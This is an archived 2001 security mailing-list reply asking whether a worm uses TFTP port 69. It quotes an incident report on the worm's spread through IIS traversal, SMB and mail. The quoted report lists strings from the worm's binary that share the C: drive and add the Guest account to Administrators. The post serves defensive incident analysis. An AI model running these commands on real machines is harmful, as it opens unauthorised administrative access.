You say that the worm gets a payload by tftp... Is it using port 69? Thanks, Dave Sill Server Admin Socket Internet Services davidsat_private Is the worm On Tuesday 18 September 2001 10:47, you wrote: > Hi all! > > > We've all just been hit by a VERY aggressive worm/virus. > > Quick analysis indicates that it propagates itself in > a number of different ways: > > Through use of IIS UNICODE direcory traversal coupled > with the recent IIS .dll privilege escalation attack. > It uses SMB/CIFS and TFTP to get the worm payload. > > Through MAPI mails (probably to all of addressbook). > > Other ways of spreading may be possible, but we haven't > yet had the time to properly analyse the worm/virus. > > It seems to share "c:\" via SMB/CIFS as "c$" and > the worm/virus also adds the "Guest" user and "Guests" > group to the local "Administrators" group.... > > > Interesting strings in binary: > > Concept Virus(CV) V.5, Copyright(C)2001 R.P.China > > SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security > share c$=c:\ > user guest "" > localgroup Administrators guest /add > localgroup Guests guest /add > user guest /active > open > user guest /add > net > > > More info as we come upon it..... > > /olle > > --------------------------------------------------------------------------- >- This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:17:59 PDT